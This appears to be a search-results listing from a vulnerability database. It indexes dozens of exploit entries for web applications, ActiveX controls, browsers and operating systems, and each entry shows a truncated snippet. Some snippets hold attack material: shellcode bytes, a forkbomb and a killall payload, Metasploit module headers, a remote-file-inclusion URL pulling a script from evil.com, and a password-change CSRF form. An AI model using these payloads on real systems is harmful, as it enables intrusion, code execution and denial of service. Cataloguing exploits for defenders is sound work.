56796 matches found
Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
No description provided by source. $Id: novelliprintexecuterequest.rb 10429 2010-09-21 18:46:29Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing a...
balitbang cms 3.3 - Multiple Vulnerabilities
No description provided by source. !===========================================================================! CMS Balitbang Edit File Vulnerability Author : Xr0b0t [email protected] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com Date : 18 Mart, 2010 Tested on...
CuteFlow 2.11.2 - Arbitrary File Upload Vulnerability
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
No description provided by source. I'm quite proud of this list cycle trick, here's how to turn it into an arbitrary write. First, we create a watchdog thread that will patch the list atomically when we're ready. This is needed because we can't exploit the bug while HeavyAllocPool is failing,...
DieselScripts Diesel Paid Mail Getad.PHP
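Vulnerability type: input validation error. Vulnerable file: Getad.PHP. Impact: an attacker can exploit this vulnerability to obtain user cookies and use them to carry out further attacks. Solution: the vendor has not released a patch; using Jiasule (加速乐) is recommended: source: http://www.securityfocus.com/bid/19646/info Paid Mail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to...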
WaveMax Sound Editor 4.5.1 - Denial of Service PoC
No description provided by source. Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= 1.cda; my $junk = \x41 x 1000; open$FILE,$file; print $FILE $junk;...
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
No description provided by source. $Id: hpnnmsnmpvieweractapp.rb 12098 2011-03-23 15:47:20Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
Dvbbs 7.1/8.2 boardhelp.asp Multiple Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary code in the...
UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability
No description provided by source...
Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness
No description provided by source. source: http://www.securityfocus.com/bid/8419/info A weakness has been discovered in Microsoft URLScan and RSA Security SecurID when used in conjunction on a web server. The problem is said to occur due to the order in which the products are placed within the...
Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities
No description provided by source. Xomol CMS v1 Login Bypass & LFI, coded by DNX. Discovered: DNX. Vendor: http://www.xomol.net. Detected: 12.05.2008. Reported: 13.05.2008 didn't work: hos...
Siteman 1.1 User Database Privilege Escalation Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. Apparently, an attacker can supply...
PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln
No description provided by source. PHP-Fusion Mod triscoopracesystem raceid Remote SQL Injection Vulnerability ++++++++++++++++++++++++++++ Author : boom3rang webpage : www.khg-crew.ws greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - -=Kosova Hackers Group-= ++++++++++++++++++++++++++++ + Dork...
BrowserCRM 0 Results.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16435/info BrowserCRM is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
dalbum 144 build 174 and earlier CSRF Vulnerabilities
No description provided by source. dalbum 144 build 174 and earlier CSRF Vulnerabilities =================================================================================== Exploit Title:dalbum 144174 and earlier CSRF Vulnerabilities Vendor: http://www.dalbum.org/ Download link...
SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/37554/info SendStudio also called Email Marketer is prone to a cross-site scripting issue and a security-bypass issue. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecti...
bfcommand & control server 1.22/2.0/2.14 manager Multiple Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/14690/info BFCC and BFVCC server managers are vulnerable to multiple remote vulnerabilities. The first two issues are login bypass vulnerabilities. These issues allow remote, anonymous attackers to gain access to the...
shopmaker cms 2.0 (bsql/ lfi) Multiple Vulnerabilities
No description provided by source. Shopmaker CMS bSQL/LFI Multiple Remote Vulnerabilities ============================================================================== Software : Shopmaker Asp version : version 2.0 Vendor : http://www.shopmaker.dk/ Author : Platen mail: platen.secureatgmail.com...
Dvbbs 7.1/8.2 dispbbs.asp page Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14498/info DVBBS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary code in the...
Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities
No description provided by source. ----------------------------------------------------------------------------------------- joomla comdjcatalog component SQL/bsql Injection Multiple Vulnerability ----------------------------------------------------------------------------------------- Author :...
V-CMS PHP File Upload and Execute
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion Vulnerability
No description provided by source. VWar = v1.5.0 R15 mvcw.php Remote File Inclusion, coded by DNX. Discovered: DNX. Vendor: http://www.vwar.de. Detected: 26.02.2007...
BES-CMS 0.4/0.5 start.php File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The...
BPDirectory Business Directory Authentication Bypass Vulnerability
No description provided by source. .WEB.ID...
Pointter PHP Content Management System Unauthorized Privilege Escalation
No description provided by source. 'Pointter PHP Content Management System' Unauthorized Privilege Escalation CVE-2010-4332 Mark Stanislav - [email protected] I. DESCRIPTION --------------------------------------- A vulnerability exists in the 'Pointter PHP Content Management System'...
dalbum 1.43 - Multiple Vulnerabilities
No description provided by source. =============================== Vulnerability ID: HTB22941 Reference: http://www.htbridge.ch/advisory/csrfcrosssiterequestforgeryindalbum.html Product: Dalbum Vendor: http://www.dalbum.org/ http://www.dalbum.org/ Vulnerable Version: 1.43 Vendor Notification: 05...
Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...
Setiran CMS Blind SQL Injection Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploit Title: Setiran CMS Blind SQL injection Vulnerable Date: 1-07-2010 Author: Th3 RDX Software Link: Version: n/a Tested on: Demo Site category: webapp Code : n/a...
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...
irokez blog 0.7.3.2 (xss/rfi/bsql) Multiple Vulnerabilities
No description provided by source. ================================================================================ || Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS ================================================================================ Application: Irokez Blog ------------ Websit...
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
No description provided by source. ECHOADV66$2007 SendStudio = 2004.14 Remote File Inclusion Vulnerability...
Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
No description provided by source. !/usr/bin/perl -w Exploit by Noam Rathaus - Beyond Security Ltd. Exploit for the SiteMan vulnerability discovered by: amironline452 [email protected] use Digest::MD5 qwmd5 md5hex md5base64; use IO::Socket; use strict; ./siteman.pl / vulnerable.host ...
EasyGallery 1.17 EasyGallery.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17624/info EasyGallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
OpenWFE 1.4.x Remote Cross-Site Scripting And Connection Proxy Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/11514/info OpenWFE is affected by a cross-site scripting and connection proxy vulnerability. These issues are due to a failure of the application to properly sanitize user-supplied input. An attacker may leverage the...
Apple Safari file:// Arbitrary Code Execution
No description provided by source. $Id: safarifilepolicy.rb 13967 2011-10-17 03:49:49Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory Information Title: Sun xVM VirtualBox Privilege Escalation...
DvBBS 2.0 'boardrule.php' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36282/info DvBBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
Linux x86 forkbombe
No description provided by source. / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan [email protected] Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 a: 8048054: b0 02 mov $0x2,%al 8048056: c...
PHP Classifieds 6.20 - Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/28521/info PHP Classifieds is prone to multiple cross-site scripting vulnerabilities and an authentication-bypass vulnerability. An attacker may leverage these issues to gain unauthorized access to the affected applicatio...
IWebNegar Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/11946/info iWebNegar is reported prone to multiple SQL injection vulnerabilities, these issues exist due to a lack of sufficient boundary checks performed on user-supplied URI parameter data. These issues could...
Cuteflow Bin 1.5 - pages/showuser.php language Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/28500/info CuteFlow Bin is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include a SQL-injection vulnerability and multiple cross-site scriptin...
Firefox 3.5.3 - Local Download Manager Temp File Creation
No description provided by source. / getunique.c AKA Mozilla Firefox 3.5.3 Local Download Manager Exploit Jeremy Brown [email protected] // jbrownsec.blogspot.com // krakowlabs.com 10.28.2009 When downloading files through Firefox and choosing the Open with option, Firefox will create a...
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent;...
AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability
No description provided by source. AJ Auction OOPD V.1 SQL Injection Vulnerability ======================================================== Author: Hussin X = = Home : www.tryag.cc/cc = = email: darkangelg85atYahooDoTcom = hussin.xathotmailDoTcom = =...
Solaris/x86 - SystemV killall command - 39 bytes
No description provided by source. / Title: Solaris/x86 - SystemV killall command - 39 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Date: 2010-06-0...
BitchX <= 1.0c20 Local Buffer Overflow Exploit
No description provided by source. / Tested on BitchX-1.0c19 /str0ke / / P.o.C Exploit Code for BitchX made for Version BitchX-1.0c20cvs -- Date 20020325 C 2004. GroundZero Security Research and Software Development http://www.groundzero-security.com released under the GNU GPL -...
WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow
No description provided by source. !/usr/bin/python Title: WM Downloader 3.0.0.9 .asx Local Buffer Overflow Date: 03-29-2010 Author: b0telh0 Tested on: Windows XP SP3 windows/exec - 227 bytes EXITFUNC=process, CMD=calc.exe shellcode = \x29\xc9\xb1\x33\xda\xd3\xbd\x07\x4a\x9e\x37\xd9\x74\x24\xf4...
D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities
No description provided by source...
radlance gold 7.5 - Multiple Vulnerabilities
No description provided by source. I AM MUSLIM !! IN THE NAME OF...
Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit
No description provided by source. form name=userform action=http://target/register.php method=post input name=step type=hidden value=regform tr td class='tableh2' colspan='2'Account Information/td /tr tr td class='tableb' width='160'Username/td td class='tableb' /td /tr tr td class='tableb'...